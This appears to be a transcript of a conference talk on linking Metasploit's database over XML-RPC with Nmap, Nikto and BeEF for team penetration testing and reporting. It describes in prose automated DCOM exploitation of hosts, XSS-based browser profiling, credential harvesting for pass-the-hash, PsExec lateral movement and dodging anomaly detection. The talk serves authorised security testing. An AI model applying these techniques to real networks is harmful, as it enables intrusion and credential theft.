 Good morning. Thanks for coming out. I hope everybody had a good evening and is rehydrating now. Welcome to a multiplayer metasploit, tag team, pen testing and reporting. I'm Ryan Lin. I'm an information security engineer for sass institute. And I play around with metasploit for fun. So this isn't my day job, but I think that it is a great time. So we're going to start off by talking a little bit about why we did this. So talk a little bit about why I think this is a really cool thing. Talk about what solutions are out there. Currently talk a little bit about how all of the communication happens. Discuss a little bit about types of objects. And I'm actually probably going to do demos early to make sure that we get to see fun stuff first. So the reason that I started working on this is because when I was doing pen tests with other people, it was hard to organize information. You know, we have wikis, we have dratus, we have all sorts of other things. But it all requires some good attention to detail from the people working. If you have results and you're multitasking and you don't upload them right away, you can have people waiting for data. You can have people that have incomplete data. And overall, just making sure that in a team environment, especially when it is in a separate physical area, so you may have one person testing remote, one person testing locally, or even people in different rooms in the same building, it's hard to make sure that you have all the coordination there. So it occurred to me that metasploit has a really powerful database back end. But the problem is that it's hard to get to that information right now. Unless you're sitting in front of the console, pretty much one person can work on it at a time. So what was missing for me is I use a lot of the XML or PC capabilities, which allows you to remotely talk back and forth to metasploit. So since there wasn't a database module, I said, okay, fine, I'll write one. So I went ahead and made it so that remotely you can talk to metasploit, you can push data in and you can get data out. So now that I had that part, I wanted to make sure that I had some good ways for some of my applications to talk in. So you're going to see three examples today. The first one is in map. The second one is going to be Nicktoe. And the third one is going to be beef. So what our goal is, is instead of doing tasks, then when you're done uploading stuff in, what if you could go ahead and your scanners directly log the data into metasploit? Then at that point, what you really have is you have real-time actionable information in metasploit. So as you're going through your process, you're not waiting on other people. You're not wondering, hey, is this information complete or not. There are programmatic things that you can do to find out whether or not someone has started a task, completed a task, what the status of the data is in the database, and as you start building profiles, for instance, you know, most scams start at low IPs, go to high IPs. You know, once you have a couple of different types of scans running, you can already be looking at information from some of the first parts of the scan before the scan is even finished. So that's the basic problem. So that outlines most of that. The other piece is reporting. So two of the things that, holy crap, you guys want to riot too? No. But so basically, the one of the problems is once you have all this data, how do you get a delta from one test to another? So we already have all the data in the database. So programmatically, it should be pretty easy to say, tell me what things are different from the time before. Also, there's no easy way to automate reporting once you get all this data in metasploit. You can look at your hosts. You can look at what exploits ran. You can look at all that. But, you know, how do you dump out a report that says, this is what I did. This is what time it was. You know, what got me shells back? What didn't get me shells back? You're lying a whole lot on the people doing the pen test, being really scrupulous about one information they're writing down. Also, if someone comes to you and says, what happened at this time? It's nice to be able to go, okay, let me look at this specific time period and say, these were the tests that we were running right then and have all of that in a central location. So right now, I think Drey this is one of the strong alternatives to this right now. But the problem is back again to, okay, so we're running tasks, then we're putting data into the database. And then we can sort of correlate there. But it's all people having to be very diligent about as soon as they're done getting results, making sure that things are uploaded. You don't have any real-time analysis. And especially if you have scans that are long-running scans or, you know, scans where you have multiple pieces, you know, it's not necessarily extremely easy to put all that back together and get a comprehensive view of what you've got. Leo, I included because it's on the backtrack CD. So I know a lot of people are familiar with it. And it's not really geared for multi-person, it's really geared for only one person. And wikis are cool, but they're really arbitrary. So you have to be very good about having a librarian to keep all your information together. So since Metasploit is really accessible, you know, I think probably everybody knows where to get Metasploit. I decided to extend the XML RPC stuff to facilitate the database transactions. And this is some stuff that Metasploit Express already does, but it does it through some other methods. So I don't have money. So I thought that this would be a good way for me to get the same information. So I just went ahead and created a database module and then started figuring out what extra pieces I needed to add to it for it to be useful to me. So the XML RPC extension allows the central logging of all the information. But the most important thing for me is that all this information is actionable. So as far as when you're pulling vulnerabilities in, when you're doing all of the scanning, all of the information that you have available is information that you can run Metasploit modules against, is information that you can query from other applications to perform further tests. And overall, it gives you a central store of information where you can have applications pulling and pushing data out so you can have very up-to-date information that is available to your applications and your testers. So I'm going to, instead of doing that, start off just showing you guys some stuff because that's a lot more fun, I think. And then we'll talk about how it works for people who are interested. So the first thing I want to show you guys is, last year I released a tool called InSploit, which allows you to launch attacks from InMap and use Metasploit on the back end to actually perform the attack. So as InMap is going through, InMap can call an InMap scripting engine script to go out, talk to the Metasploit database, and then Metasploit will launch an attack on InMap's behalf. So along those lines, most people probably don't want to just start throwing exploits out there. But the InMap scripting engine is very powerful. It has port rules, which will allow us to say, if a port is open or in a certain status, let's fire a job. So the job that we're firing in this case is I've added the code to InSploit for this year to be able to directly talk to Metasploit and add hosts into the database. So the first thing we're going to do is we're going to start up the MSF console. And I've created a little RC script here that starts off by connecting to the Metasploit database as the user MSF to MSF. And Metasploit is going towards using Postgres. For a while, you were able to use SQLite 3. But as the product becomes more powerful, you really want to look at switching towards Postgres. And Postgres is on back track, so it makes it a lot easier. So we're going to connect to our database back end using user ID MSF to the database called MSF. Then we're going to load the XMLRPC module using our elite password of ABC123. And the server type function is important. For a lot of this stuff I'm going to be showing, I'm using the web version. There's also a raw version, but the server type web is important because what this allows us to do is to communicate via the server over HTTP using XMLRPC. With a lot of the stuff that is out there, this makes it just really easy. If you use the traditional server, that's a null terminated, raw XMLRPC. And so you have to write some transforms for your code. So we're just using this because it's easy and I'm lazy. So we'll go ahead and start this up. And as it goes through, you'll see the database creating objects. Actually, let me make this bigger so you can actually see the database creating objects. Can people in the back see that? Maybe? Yes? Okay. Well, if you can't, then wave at me and I'll fix it. We make this a little bit larger as well. Okay, so what I've done is through InSploit, which is, again, a series of NSE modules and NSE scripts for the NMAP scripting engine. I'm going to basically just run a raw scan right now. Once you have InSploit installed, the Metasploit modules for actually adding the ports are set to run by default. So if you install it into your distribution, then it will go ahead and try to add stuff for you as it can. So we just have to do an NMAP-A and type in the right address. And so we're going to just start scanning our local little network up here. So back here, I have a listener for the XMLRPC channel. So one of the things that you'll notice is over here for NMAP, we're actually going to have data flowing through XMLRPC coming into our database before NMAP is even putting the data to the screen. So we're going to have more up-to-date information in our database than NMAP is even presenting us to the screen as we're scanning. So that's, I think, one of the pluses. As you're going through a scan with NMAP, especially for longer stuff, you're going to have data that is actionable in your database before any of this other stuff has happened. So there's NMAP sending all of the wonderful goodness into the database. And you can see that it hasn't actually printed anything to the screen yet. So we now have hosts that we know about, and we're just now seeing some output to the screen. So I'm going to let this go for a second while I talk about the next part. The next thing that I wanted to do was to be able to get some vulnerabilities in, to be able to really talk about, to really get a better picture of how all of the stuff was fitting together to be able to look at a whole host and figure out what vulnerabilities and what other actionable information we have. So I chose NICTO because I do a lot of web stuff and created a new report type for NICTO that would allow us to, as NICTO is scanning, go through and add vulnerabilities to the database. So now that we're done with the NMAP scan, we can look at our hosts and we have all of our host information and we have our services and we can look at all of that information. So as part of the scan, we discovered that we have a server here that is listening on port 80. So let's go over to NICTO and look at exactly what vulnerabilities that might have. So our format for NICTO is right here. Basically, what we have done is we've created a new reporting format. So I'm going to be releasing all this code on Monday on my blog, but the new format requires just a little patch to NICTO and will hopefully be in the distribution coming up within the next month or so. We specify our output file, which is the dash O, as our username, colon password at the URL for our RPC listener through Metasploit, which Metasploit listeners by default are on 55553 and use for the HTTP version a RPC directory of RPC2. So we choose our host the 192.168.1.254 and we'll just watch it start scanning and then we can look at that information going directly into the database. So with this, with NMAP, it has to do a little bit before it actually starts running scripts. So as it is actually doing the port scans, we're not getting that data back, but as soon as NMAP starts the script portion of its scan, then it will put data into the database during that portion. With this, it starts pretty early. So we already have vulnerabilities in our database. So as it continues to add, we can see that number increasing. One of the important things to note about this though is if you notice there's not a whole lot of data here that's very meaningful. And the reason is most of the time when people are using Metasploit, they're looking at the vulnerability references, because that's what gets you the exploit modules that you can use to further gain access to hosts. So the thing is, all of this data is actually stored in the database. So we're actually going to be able to get more data out of Metasploit than what is traditionally printed to the screen through some of the reporting capabilities that we have. So as this goes through, we now have all of our vulnerabilities pushed in. And as you can see, we have a couple of different vulnerability references. So the next thing that we want to do is look at how to use this for reporting. So right now we have some hosts in here. And if we want to get a full picture of what's going on, we can look at DB hosts and say, okay, we can find our host and it's alive. And we know when it was added. And we can go over to DB Services and we can say, okay, so let's match this up with the information that we have. And then we go over to DB Volms and, okay, so that's not necessarily the easiest way to get to all this. So instead, I wrote a host infoscript. And what the host infoscript is going to be able to let us do is to pull a full profile for a host that we have in the database and get all the information out. So there's four sort of core pieces of information that Metasploit stores about hosts. We've got the host information itself, which is like when the host was discovered, if it's up or not, all that stuff. Service information, which is the basic stuff we get back from NMAP, what services are, whether or not they're up, all that goodness. We have vulnerabilities which are pretty much a map host and service to a vulnerability type and store a little bit of extra data on that. And then notes which are sort of general purpose storage. And you can put pretty much anything in a note that you want to retrieve later. So the host infoscript that is going to be in the source that I distribute is going to be able to pull the full listing of everything that's in the database about a specific host. So let me go ahead and change this up to be the host that we were actually scanning. And so we basically specified it, the username and password for our XML RPC, our XML RPC destination, and the IP address we want information for. And so this is just some quick and dirty Python. And I'm going to go over how the code works in a couple minutes. But so from here we have all of our basic information. We've got the basic NMAP information about when the host was first discovered and last discovered. And so this is important for if you've run multiple scans or something like that, you can see which scans something went in as. The port information about what ports were found. And you'll notice there's no OS listed here. Typically if you have a couple ports open, a couple ports closed, then you'll get some OS information. But there weren't enough ports open to identify the host for sure, so I don't include it here. So for vulnerabilities, if you remember from the NICTO output there was a lot more verbose output. Here's the verbose output that we had from NICTO that we're getting directly from the Metasploit database. So we have all of that data from before and this will help us aggregate it. So where this is valuable is you have multiple pen testers working on multiple things. And so each person is probably concentrating on one or two things at a time. This will let you go into the database, pull everything you know about the specific target that you're looking at, and if you'll have immediately all of the relevant data for that host and one little report that you can look at instead of having to go for multiple places and possibly multiple documents to get the information that you need to really make some actionable decisions. So this just goes through list of vulnerabilities. There's no notes for this host so there's none included here. So the third thing I did is for beef, one of the things that you can do is you can really build some host profiles. But all that you know about the host while you're running beef, which for people who may not be familiar with it, beef stands for the browser exploitation framework and it allows you through cross-site scripting to encourage a target browser to execute code on your behalf. So basically what we can do with that is we can encourage the browser to run some fingerprinting information for itself. We can log that into the Metasploit database and then over time we can start building a profile of for instance maybe a company intranet just based off a cross-site scripting vulnerability. So let me go ahead and pull that information up. So what I've done is as beef is going through and gathering data, it's logging into the database. But also as you pull zombie reports, it's also pulling any information out of the database that you have about that host. So when you're looking at a host in beef, you actually have all the actionable information that you may need in order to be able to do real work with it. So this is the front end for beef. Let me go ahead and I've got a got a happy little Windows box over there that I have running our sample cross-site scripting. And so as we can see we just had a zombie pop up. So to start off with just for basic information we can go into our zombies and we can pull everything we already know about this host. So to start with you know this is all of the basic stuff that beef normally logs information about what the browser is, what the operating system is, resolution, all that good stuff and a little bit of information about the page it's on. So all of this information is now logged into Metasploit. So offline we can get to all of this stuff but also more importantly for instance if you have a couple people who are accessing the company intranet page you may be able to tell a lot more about what's going on with the company just based off this portion right here which is the HTML that was on the page that had the vulnerability itself as the person who was looking at it. So you can get a whole lot more information especially if you know maybe you're looking at testing an HR app or something like that you could really have the potential of maybe mining more information and showing that maybe the HR app has vulnerabilities by actually showing people what each person was looking at on on that page. So now you have all of this delicious information and you want to go ahead and further gather information about a host. So we can click on our zombie go under our standard modules and find out if it's got Java or whatever. So we'll select it and send now to determine whether or not the host has Java installed. You'll see over here that module code was sent and that Java is available and when we come back over here to our zombies we can see that it is both here in our module results but also here in the Metasploit information. But you can also come back over here and see we now have a bunch of notes about that host. So all of this is pulling it back and forth and and really merges things together. So again for for the beef portion if we were to have an internal host drop a little bit of JavaScript on it as some stored cross-site scripting then we can really build a large profile of an organization what types of browsers they're using through the auto run plug-in portion of beef we can start profiling what applications are installed in the browser and things like that. So I guess if you're interested in doing maybe further social engineering or further testing you have a better idea of what software may or may not succeed. So this will let you build a much stronger profile of an organization from a different perspective than what your typical scanning gives you. So the last demo I want to do is so right now we have some from vulnerabilities but you know most people are not going to want to just do Nikto. Most people are going to want to run Nessus or QALUS or something like that. Metasploit already supports a couple different file formats including Nexpos, QALUS, Nessus and I think there may be one or two others. But remotely it's not easy to push that data back into the database. So I wrote a quick script to just take a file that we have from QALUS or Nessus or whatever and go ahead and insert that into the database so that we have all of our data in one place. And again all of this stuff right now I'm doing it locally but the whole point of this presentation is you can actually do this multiple people from multiple locations and have this all centralized back to a central place. So multiple people are doing this. You don't just have to be able to do it from localhost. So we're going to come back over to this window and so I have this import file script and I have some happy little NBE files. So pretty much for import file it takes the same stuff as the host info does. Our XML RPC location, our username and file which we're going to use the illustrious test 2.NBE and we're going to go ahead and upload that. So we just now have uploaded our Nessus information. We look at our DB Volens again. We have all that information in there now. So now we can go ahead and pull another report and that one was for 236 and so now based off that Nessus data that we had which was completely different than the NMAP data we now have all of the same information that we were able to get before. So that really allows everything to come together nicely. So at this point I'm going to talk about code and how it all fits together for people who are interested. There's a couple different types of objects that are involved here. The first is workspaces. Workspaces sets a chunk aside for the project that you're working on. Where workspaces become nice is if you are doing a pen test of the same company multiple years in a row then you may be interested in pulling your database from last year for the same thing, opening a new workspace and then as you're looking at changes between the two years for things that have hopefully improved then you can compare the two workspaces programmatically to be able to determine what has changed and what hasn't. The host is pretty self-explanatory, services, volums and I'm going to go into these for just a second a little bit deeper. So the workspaces are pretty much just labeled by name. The name is arbitrary. It keeps some information about when it was created at and there's a description field to allow you to give it a more descriptive label like you know Ryan's pen test from 2009. The hosts have a lot more information in them. They have all sorts of information that you get from in-map like the name, exactly what flavor of OS it is, the address and there's actually a separate field for IPv6 so you can actually be looking in a host in the context of both the IPv4 and IPv6 address. The services, each service maps to a host and it includes just the port, the protocol, the state. It also has some name information about what that service is and you can also drop in some extended information. For instance, full banners and stuff like that that you can pull back later. The volums is actually a relatively small table. It has a reference to a host in a service. You have the name of the vulnerability. You actually have references for OSVDB or CVEs or whatever that relate to that and then you have an info block where we are storing all of that extended information about the full text of vulnerabilities. So notes are pretty cool because if you have something that's not a vulnerability but you want to keep track of it, you do that with notes. So notes have a note type which is essentially arbitrary. If you are developing something new, you want to keep track of it, you can create your own note type. Notes pertain to services and hosts. You can have critical whether or not it's been seen before and then it has a data block and you can store pretty much anything you want to in that data block. Most of the time objects are stored so you can actually store information, extended information about what you found. So for instance, if you're storing information about maybe V hosts that you found on a server, you can actually include an array of V hosts in that object and have all of that accessible when you go through and pull your reports. Events are important to figure out what's going on on the system. Every time you type a command, an event is logged. So you have the host that it came from, the name, whether or not it's been seen, username and then the extended info talks about what really happened. So if you have multiple people acting on the database, you're wondering who's doing whether or not a scan is started or finished. You can be logging the event information when the scans start and finish and tell real time what the status is and what people are working on. So then we have Fat Loots and for Loot, Loot is mostly used by Nextva or sorry, by Metasploit Express and the more commercial products, but we have it available to us as well. So with the Loot, it's basically anything that you have acquired from the host that you find to be valuable. We don't store the content necessarily in the database, but we have the host service information, the type of the stuff that we have acquired. And then the path variable says where to find that. So if you have a shared storage area that secure where you put all of the goodies that you required, for instance, maybe cracked password and stuff like that, you put the path to that. The data has some extended information about what that information is. The content type says exactly what it is. And then you have a name just to keep track of it. Clients are what we're using for beef. For all of the web stuff, we keep track of a couple different pieces of information as we have hosts come in. This information is also stored by things like DB Autopone and any of the other web parts that come in. We get information about the host, the full user agent string, but we also get some parsed out user name or sorry, user agent information like the name and the version. So if you are looking for maybe performing some further testing on an older version of IE, this would become very handy. You can just go in query all of our hosts that are running an older version of IE and then send them a little file to test out. For users, the user information isn't always directly visible, but we can view it. It is created automatically. There's a plug-in that will allow you to get to it from the console, but through XML RPC, we can get to it regardless. So we can store data here even the Metasploit itself is not storing data here. As we go through and we acquire some credentials, we have the ability to log all of that here for action in the future. This is especially valuable if you're doing things, for instance, you're wanting to do some pass the hash or things like that. We've got all of the tokens here and things like that that we can store to be able to further gain access on the network. So I have a little bit more time. So I'm going to actually go into some of the code itself at this point. The code for a lot of this is fairly simple. I'm using Python because Python has an XML RPC module that facilitates working with this stuff very well. So I'm going to start off by looking at just the host info stuff. So for host info, all of this stuff up top is just parsing options. So basically from the options that get passed in, we need a server URL that we're going to connect to. We need the username and the password to authenticate to XML RPC. So for XML RPC, there's a couple pieces of information that are really good to know when you're writing applications. The first is after you authenticate, you're given a token. That token is good for 15 minutes. And any subsequent request that you make, you pass in that token. After 15 minutes, then you won't get anything back except for errors from Metasploit. So you have to make sure you're renewing your tokens every 15 minutes. I occasionally, when I've done stuff because I've had slowness and things like that, ended up with tokens appearing to be expiring before the 15 minute mark. So typically when I'm writing stuff, I renew my tokens at the 10 minute point. So right here, we are opening a RPC connection into the Metasploit server. Then we call the auth.login function. And the auth.login function, we passed our username and password, we get back our token. If the result from that pretty much all of the calls come back with a result if it is a thing that you're asking it to do. If you're asking for data, you don't get a result back, you just get data back. So since we have a result back, we know that we were successful. And then we take the token from that, and we're going to use that for the rest of the stuff that we do. After that, we define our workspace. If we're looking at a specific workspace, then we will go ahead and assign that to our extra options. And after that, we just start asking for stuff and printing it out. So the get host says get all of the hosts that we specified on the command line. And then after that, it's just a matter of enumerating through and printing stuff out. So for services, we just drop into a loop and print out each piece of the object at a time. So it's not overly complicated. Probably as you're going through, there's not a lot of documentation on exactly what's being returned right now. There's a wiki page in Metasploit, which I'm going to start updating as soon as this makes it into the trunk with one information to return back from which pieces, so that there's some good reference for that. As far as the other functions go for XML RPC and the documentation subdirectory, there's an XML RPC.txt that has a list of what you pass to each one of the functions. So sorry, this is a little bit a pain to read, but basically we're just iterating through stuff and printing out each piece of the object in order. So where this is especially valuable is if you want to perform further actions on stuff that you've done. So for decom.piphone, which I wanted to do something where I could test and make sure it's working, and decom always works on XP service back zero boxes just about, which is the awesome box that I've got up here. So for testing, it makes it really easy. So basically to only send it to hosts that have the right stuff listening, we specify our information about where to connect to up here. We're connecting to our local host logging in. And then after that, we are going to get a list of all of our services that are running on 139 for TCP. And so from there, we can make sure that as we're calling stuff, we're only calling hosts that are relevant. So from there, if you're going to be doing stuff like this, a lot of the time you're better off using multi handler than you are using the default handler for exploits. And for people who may not be familiar with multi handler, what it does is it acts as the handler for the exploits themselves. So you can have a whole bunch of different reverse TCP connections coming back in to the same place. And you don't have to worry about any sort of conflicts with ports or anything like that. So I do two things here. First, I start off by going ahead and running multi handler so that any connections that come back to the multi handler instead of the payload handler for the exploit itself, then I pull the list of services. And for each service that's listening on port 139, I run call exploit on it, which just does a basic execute for our exploit using our authentication token. And in this case, the Windows, DC, RPC, MSO3, 026D COM vulnerability. For this, we just have to specify our IP address, or sorry, the IP address of the remote host that we passed in, the payload we want to use, RIP. And then one of the important things is the disabled payload handler, which is what actually turns off the payload handler. This will also increase the speed as stuff goes out, because your exploit won't be waiting for something to connect back to it. It will send the goodness out and then wait for it to connect back to the multi handler. So for here, we have a couple things that are running on Microsoft ports. So we should be able to just come over here, run our dcomm.py, and it pulled the hosts that are in the database, and now we have remotely called the exploit, gotten back our host, and we have all of the goodness that we may want. So with something like this and with PSXEG, one of the nice pieces about it is, say you have gotten one host, you have captured some credentials, and you want to look at what other hosts in the network you may be able to get additional tokens on for past the hash. With PSXEG, you can go through, you can put in the credentials that you have right now, start scanning the network, and then use metropodors auto-run capabilities to do further information gathering as you're going through the network. So you may want to do something along the lines of WinEnum, which as it connects into the host, it can run your shell, comes back, and will pretty much profile everything about the host. As this goes through, you can start looking and further elevating privileges, using the information from there, but you'll also get a lot better network map as you start going through with that. Now the plus side is, is because we have already done an in-map scan, and we know which hosts are listening on Windows ports, we're only going to be sending the stuff to Windows hosts. So if you have some sort of network anomaly-based detection that's looking for traffic on, you know, Microsoft ports for Linux boxes or whatever, you're not going to trip that. And also you make sure that if you're limiting your scope, you're only making, you're only doing things that apply directly to your scope. So one of the scripts that might make sense for the future, if people are interested in making sure that all of the hosts that they've scanned, the information that they may do things that are actionable on is only limited to certain ranges, is go through, look at what all's there, and then delete everything out of the database before they are outside of their scope. So as far as the input goes, right now I just have it adding ports. But one of the things that would be really cool is for the in-map developers as they start writing checks for extended information about shares and all of the other goodness that's involved, to be able to drop notes through this to be able to, as you're scanning, log every piece of information that shows up as the script portion for in-map. So I'm going to look a little bit with you at the in-map stuff. So the latest version of InSpoight will run a lot more places. It has, before when, sorry, last year when I released it, it required an additional Lua module. Now it is straight XML or PC. It requires nothing else. So it should run on iPhones. It should run on any sort of device that you can put in-map on and has the Lua stuff installed for scripting. So for this, when you drop it in, you've got two separate directories. You've got your NSELib and you've got your scripts. So my in-map is installed in usual local. And so if you look in user local share in-map, you'll see that there's two directories which correspond to the NSELib, which is all of the core libraries that the other scripts use and the scripts themselves. And so pretty much you copy everything from NSELib and the exploit distribution over to NSELib and everything from scripts to scripts. And so when we look in the scripts, we have MSF AdPort. So basically for this, we have two separate pieces. The port rule says when this should fire. And so we've said that the port rules should fire whenever it finds a port that is in the open state. And the action when it does that is we start off by initializing the exploit stuff. And for exploit, you have a file that is in your home directory with all of the information about where to connect to. Otherwise you have to pass a whole lot of information to in-map and it's not a lot of fun. So the config file ends up being a lot easier. So the MSF init pulls your values in. And then for this, we specify our options for things that in-map has found for us. Our host IP, our port number, protocols, blah, blah, blah. And then from there, we can just issue an MSF call directly to the XML RPC API function. It goes ahead and takes care of the token handling for you. And the reason for that is in-map has some storage area where we can deal with that a lot easier than any of the individual scripts can handle it. So I take care of all of that in the exploit library. So pretty much all you have to pass to this one is the function you want to call and the options. So this goes out, connects to Metasploit database as the data and comes back. And a lot of this stuff has the ability to run in parallel. So I'm getting close to being to the end. So thanks very much. I've had a great time here. Thanks to all these people who've helped me get stuff going. And also especially to the people who've written the tools that I'm leveraging. Especially the Metasploit guys, Theodore and Wade Alcorn who've helped me a lot with stuff. So thank you guys very much. Here's my contact information. If you're interested in more stuff, let me know. Hit up my blog probably Monday evening and I'll have all the source code and I'll try to get the slides there. If you have any other questions, please just let me know. Thank you very much.